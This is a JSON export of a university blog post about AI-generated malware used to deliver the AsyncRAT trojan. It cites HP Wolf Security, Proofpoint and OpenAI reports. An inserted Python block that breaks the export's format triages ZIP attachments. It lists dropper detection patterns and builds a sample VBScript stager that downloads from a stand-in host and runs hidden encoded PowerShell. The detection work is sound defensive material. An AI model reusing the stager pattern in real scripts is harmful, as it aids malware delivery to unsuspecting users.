{"id":849,"date":"2024-10-18T19:26:21","date_gmt":"2024-10-19T01:26:21","guid":{"rendered":"https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/?p=849"},"modified":"2024-10-18T21:26:15","modified_gmt":"2024-10-19T03:26:15","slug":"generative-ai-used-in-developing-malwares","status":"publish","type":"post","link":"https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/2024\/10\/18\/generative-ai-used-in-developing-malwares\/","title":{"rendered":"Generative AI used in developing malware"},"content":{"rendered":"\n<p class=\"has-primary-background-color has-background has-normal-font-size\">&#8220;OpenAI says it has disrupted 20-plus foreign influence networks in past year&#8221;[4]<\/p>\n\n\n\n<p>It was only a matter of time before analysts and researchers found AI-generated malware in the wild. Last month, a report published by HP Wolf Security[5] described malicious code, apparently written with generative AI, that was detected in a targeted email campaign against French users to deliver AsyncRAT. Cybercriminals have used AI for some time to generate convincing phishing emails, but governments and researchers have long warned that AI tools could also enable more sophisticated attacks, even with the strongest safeguards and policies implemented by vendors.<\/p>\n\n\n\n<p class=\"has-large-font-size\"><strong>What is AsyncRAT?<\/strong><\/p>\n\n\n\n<p>Released in 2019, AsyncRAT is a Remote Access Trojan (RAT) that its creators describe as an open-source remote administration tool on their official GitHub page[2]. In practice it is used almost exclusively by cybercriminals: as a loader for further malware, and for remote code execution, credential theft, keystroke logging, covert screen recording and more[2]. It has botnet capabilities: infected devices are managed from a remote command-and-control (C2) server.<\/p>\n\n\n\n<p>This has become a very powerful tool for cybercriminals in carrying out their intentions. 
Since its release it has grown steadily in popularity and has been used by threat actors in attacks on a wide range of organisations, including airports, hospitals and government offices.<\/p>\n\n\n\n<p class=\"has-large-font-size\"><strong>Findings of HP Wolf Security<\/strong><\/p>\n\n\n\n<p>Researchers at HP Wolf Security[5] intercepted emails from the campaign in early June 2024; each carried the malware as an encrypted ZIP attachment. After brute-forcing the archive password, they found VBScript and JavaScript code that appeared to have been written with AI. The commenting of the script, its coding style, and the choice of the author\u2019s native language for function and variable names led the researchers to conclude that it was AI-generated.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"828\" height=\"677\" data-src=\"https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-content\/uploads\/sites\/119\/2024\/10\/comments.jpg\" alt=\"\" class=\"wp-image-851 lazyload\" data-srcset=\"https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-content\/uploads\/sites\/119\/2024\/10\/comments.jpg 828w, https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-content\/uploads\/sites\/119\/2024\/10\/comments-300x245.jpg 300w, https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-content\/uploads\/sites\/119\/2024\/10\/comments-768x628.jpg 768w\" data-sizes=\"(max-width: 828px) 100vw, 828px\" src=\"data:image\/svg+xml;base64,PHN2ZyB3aWR0aD0iMSIgaGVpZ2h0PSIxIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjwvc3ZnPg==\" style=\"--smush-placeholder-width: 828px; --smush-placeholder-aspect-ratio: 828\/677;\" \/><\/figure>\n\n\n\n<p>Image 1: The VBScript Code<\/p>\n\n\n\n<p>The script then downloads and executes AsyncRAT, which establishes an encrypted connection to the attacker\u2019s controller and fetches the component that lets the operator log keystrokes[1]. 
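The infection chain described here starts with an encrypted ZIP attachment carrying a VBScript or JavaScript stager that downloads the RAT. As an added example (not code from the original post, from HP Wolf Security, or from the AsyncRAT project), the Python below triages such an attachment the way a mail gateway or an analyst would: it flags password-protected archives, script members and double extensions, tries a short candidate password list for encrypted entries (the kind of brute force the researchers applied), and greps readable scripts for the download-and-execute primitives a VBScript dropper typically uses. The extension list, the pattern list, the sample archive and the stager text are constructed assumptions for this example, not indicators from the real campaign; the Python standard library cannot write encrypted archives, so the constructed sample is unencrypted.

```python
"""Triage a ZIP e-mail attachment for a script stager (added example, heuristics assumed)."""
import io
import re
import zipfile

# Script types that run on double-click on Windows (assumed list for this example).
SCRIPT_EXTS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh", ".hta", ".ps1", ".cmd", ".bat"}

# COM objects and command-line fragments typical of VBScript/JScript droppers (assumed list).
DROPPER_PATTERNS = [
    r"MSXML2\.(Server)?XMLHTTP",       # HTTP download from script
    r"ADODB\.Stream",                  # write downloaded bytes to disk
    r"Scripting\.FileSystemObject",    # file manipulation
    r"WScript\.Shell",                 # process creation
    r"\.Run\b",                        # WScript.Shell.Run "..."
    r"powershell(\.exe)?\s+.*-(enc|EncodedCommand|w hidden)",  # hidden/encoded PowerShell
]


def _is_script(name: str) -> bool:
    return any(name.lower().endswith(ext) for ext in SCRIPT_EXTS)


def _double_extension(name: str) -> bool:
    """True for names like 'facture.pdf.vbs': a decoy extension before the real one."""
    parts = name.lower().rsplit("/", 1)[-1].split(".")
    return len(parts) >= 3 and "." + parts[-1] in SCRIPT_EXTS


def scan_script_text(text: str) -> list:
    """Return the dropper patterns present in a script body, in DROPPER_PATTERNS order."""
    return [p for p in DROPPER_PATTERNS if re.search(p, text, re.IGNORECASE)]


def _read_member(zf, name, passwords, findings):
    """Read one member; for an encrypted entry try each candidate password in turn."""
    info = zf.getinfo(name)
    candidates = [p.encode() for p in passwords] if info.flag_bits & 0x1 else [None]
    for pwd in candidates:
        try:
            data = zf.read(name, pwd=pwd)
        except (RuntimeError, zipfile.BadZipFile):   # wrong password or CRC mismatch
            continue
        if pwd is not None:
            findings["password"] = pwd.decode()
        return data.decode("utf-8", errors="replace")
    return None


def triage_zip(zip_bytes: bytes, passwords=("infected", "123456")) -> dict:
    """Inspect an archive and return findings plus a verdict: clean, suspicious or unscannable."""
    findings = {"encrypted": False, "script_members": [], "double_ext": [],
                "dropper_hits": {}, "password": None}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            if info.flag_bits & 0x1:           # general-purpose bit 0: entry is encrypted
                findings["encrypted"] = True
            if _is_script(info.filename):
                findings["script_members"].append(info.filename)
            if _double_extension(info.filename):
                findings["double_ext"].append(info.filename)
        # Member names are visible even in an encrypted archive; bodies may not be.
        for member in findings["script_members"]:
            body = _read_member(zf, member, passwords, findings)
            hits = scan_script_text(body) if body is not None else []
            if hits:
                findings["dropper_hits"][member] = hits
    if findings["script_members"] or findings["double_ext"] or findings["dropper_hits"]:
        findings["verdict"] = "suspicious"
    elif findings["encrypted"] and findings["password"] is None:
        findings["verdict"] = "unscannable"   # no script names seen, but content could not be checked
    else:
        findings["verdict"] = "clean"
    return findings


def build_sample_attachment(with_stager: bool = True) -> bytes:
    """Constructed sample (not the real campaign's files): a decoy text file and,
    optionally, a VBScript stager with native-language comments that downloads
    and launches a payload. The stager text and URL are made up for this example."""
    stager = (
        "' Telecharge la charge utile depuis le serveur\n"
        "Set http = CreateObject(\"MSXML2.XMLHTTP\")\n"
        "http.Open \"GET\", \"http://example.invalid/stage.txt\", False\n"
        "http.Send\n"
        "' Ecrit le fichier sur le disque puis le lance\n"
        "Set flux = CreateObject(\"ADODB.Stream\")\n"
        "Set shell = CreateObject(\"WScript.Shell\")\n"
        "shell.Run \"powershell -w hidden -enc QQBB\", 0, False\n"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("lisez-moi.txt", "Veuillez trouver la facture ci-jointe.\n")
        if with_stager:
            zf.writestr("facture_2024.pdf.vbs", stager)
    return buf.getvalue()


if __name__ == "__main__":
    print("lure:  ", triage_zip(build_sample_attachment()))
    print("benign:", triage_zip(build_sample_attachment(with_stager=False)))
```

An archive whose member names are all innocuous but whose bodies cannot be opened gets the verdict "unscannable" rather than "clean": a gateway cannot vouch for content it never read, which is exactly why attackers password-protect the lure in the first place.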
Once set up, AsyncRAT can deliver many other payloads remotely.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"487\" data-src=\"https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-content\/uploads\/sites\/119\/2024\/10\/diagram-1024x487.jpg\" alt=\"\" class=\"wp-image-852 lazyload\" data-srcset=\"https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-content\/uploads\/sites\/119\/2024\/10\/diagram-1024x487.jpg 1024w, https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-content\/uploads\/sites\/119\/2024\/10\/diagram-300x143.jpg 300w, https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-content\/uploads\/sites\/119\/2024\/10\/diagram-768x365.jpg 768w, https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-content\/uploads\/sites\/119\/2024\/10\/diagram.jpg 1060w\" data-sizes=\"(max-width: 1024px) 100vw, 1024px\" src=\"data:image\/svg+xml;base64,PHN2ZyB3aWR0aD0iMSIgaGVpZ2h0PSIxIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjwvc3ZnPg==\" style=\"--smush-placeholder-width: 1024px; --smush-placeholder-aspect-ratio: 1024\/487;\" \/><\/figure>\n\n\n\n<p>Image 2: Complete Infection Chain<\/p>\n\n\n\n<p class=\"has-large-font-size\"><strong>OpenAI findings<\/strong> [4]<\/p>\n\n\n\n<p>After the HP Wolf Security findings, and Proofpoint\u2019s April 2024 report on a PowerShell loader used by TA547 (aka \u201cScully Spider\u201d) that was suspected of being AI-written, it was apparent that cybercriminals\u2019 use of generative AI had risen significantly. OpenAI has since stated that it has \u201cdisrupted over 20 malicious cyber operations trying to abuse ChatGPT\u201d. The data in the report covers 2024 only. 
The report highlights abuse of ChatGPT by threat actors in Iran and China to enhance their operational capabilities.<\/p>\n\n\n\n<p class=\"has-large-font-size\"><strong>Role of AI in cybercrime<\/strong><\/p>\n\n\n\n<p>More and more non-technical malicious actors are finding it easy to use AI-generated code to build malware and carry out attacks. AI is lowering the bar to entry into the threat landscape and giving people with limited knowledge the capability to mount large-scale attacks.[1] It is apparent that more threat actors are entering the business, lured by the prospect of quick money despite limited skills and understanding, and AI is empowering such individuals and groups to achieve some success.<\/p>\n\n\n\n<p>Researchers are now asking what effect this will have on highly skilled cybercriminals, who could use AI tools to build more dangerous applications and more sophisticated attacks. We are seeing only the first drops of a storm that has yet to make landfall as AI matures. Given the pace at which AI has evolved in the last few years, it is only a matter of time before cybercriminal activity increases many times over.<\/p>\n\n\n\n<p class=\"has-large-font-size\"><strong>Artificial intelligence in threat prevention<\/strong><\/p>\n\n\n\n<p>This is a massive topic with a wide scope: the power of AI has only been scratched at the surface, and its true potential is still unknown. It is fascinating to watch the technology evolve so rapidly as more businesses adopt it, and striking how quickly it has risen in such a short period. Just as we are seeing, to some extent, how it can be abused by bad actors, organisations are also harnessing its potential to protect and secure their perimeters.<\/p>\n\n\n\n<p>AI integration in penetration testing has been evolving rapidly. 
Penetration testing is tedious and time-consuming, and it demands significant human resources and expertise[3]. Automating parts of it with AI should allow organisations to be better prepared against adversaries and impending attacks.<\/p>\n\n\n\n<p>As more cybersecurity tools are powered by AI, more efficient threat modeling can be achieved and security professionals will be able to detect and mitigate risks faster. At the most basic level, though, it remains important to keep security tools updated, never to open attachments from unknown sources, and to double-check attachments even from known senders, because compromise can be a matter of one wrong click.<\/p>\n\n\n\n<p class=\"has-large-font-size\"><strong>References:<\/strong><\/p>\n\n\n\n<p>1. Bill Toulas, BleepingComputer: https:\/\/www.bleepingcomputer.com\/news\/security\/hackers-deploy-ai-written-malware-in-targeted-attacks\/?&amp;web_view=true<br>2. BlackBerry (no author listed): https:\/\/www.blackberry.com\/us\/en\/solutions\/endpoint-security\/ransomware-protection\/asyncrat#how-to-prevent<br>3. Jason Firch, PurpleSec: https:\/\/purplesec.us\/learn\/ai-penetration-testing\/<br>4. Bill Toulas, BleepingComputer: https:\/\/www.bleepingcomputer.com\/news\/security\/openai-confirms-threat-actors-use-chatgpt-to-write-malware\/<br>5. HP Wolf Security press release: <a href=\"https:\/\/www.hp.com\/us-en\/newsroom\/press-releases\/2024\/ai-generate-malware.html\">https:\/\/www.hp.com\/us-en\/newsroom\/press-releases\/2024\/ai-generate-malware.html<\/a><\/p>\n\n\n\n<p>Image 1: https:\/\/www.bleepstatic.com\/images\/news\/u\/1220909\/2024\/AI\/04\/comments.jpg<br>Image 2: https:\/\/www.bleepstatic.com\/images\/news\/u\/1220909\/2024\/AI\/04\/diagram.jpg<\/p>\n","protected":false},"excerpt":{"rendered":"<p>&#8220;OpenAI says it has disrupted 20-plus foreign influence networks in past year&#8221;[4] It was only a matter of time before analysts and researchers found AI-generated malware in the wild. 
Last month, a report published by HP Wolf Security[5] described malicious code, apparently written with generative AI, that was detected in a targeted email campaign against French users to deliver AsyncRAT &hellip; <\/p>\n<p class=\"link-more\"><a href=\"https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/2024\/10\/18\/generative-ai-used-in-developing-malwares\/\" class=\"more-link\">Continue reading<span class=\"screen-reader-text\"> &#8220;Generative AI used in developing malware&#8221;<\/span><\/a><\/p>\n","protected":false},"author":679,"featured_media":850,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"ngg_post_thumbnail":0,"footnotes":""},"categories":[1],"tags":[30,31,32],"class_list":["post-849","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-uncategorized","tag-genai","tag-malware","tag-trojan","entry"],"featured_image_src":"https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-content\/uploads\/sites\/119\/2024\/10\/ai-cyber-attack-img-stock_2024-600x400.jpg","featured_image_src_square":"https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-content\/uploads\/sites\/119\/2024\/10\/ai-cyber-attack-img-stock_2024-600x600.jpg","author_info":{"display_name":"Kaushik 
Mazumder","author_link":"https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/author\/kaushik-mazumder\/"},"_links":{"self":[{"href":"https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-json\/wp\/v2\/posts\/849","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-json\/wp\/v2\/users\/679"}],"replies":[{"embeddable":true,"href":"https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-json\/wp\/v2\/comments?post=849"}],"version-history":[{"count":2,"href":"https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-json\/wp\/v2\/posts\/849\/revisions"}],"predecessor-version":[{"id":856,"href":"https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-json\/wp\/v2\/posts\/849\/revisions\/856"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-json\/wp\/v2\/media\/850"}],"wp:attachment":[{"href":"https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-json\/wp\/v2\/media?parent=849"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-json\/wp\/v2\/categories?post=849"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-json\/wp\/v2\/tags?post=849"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}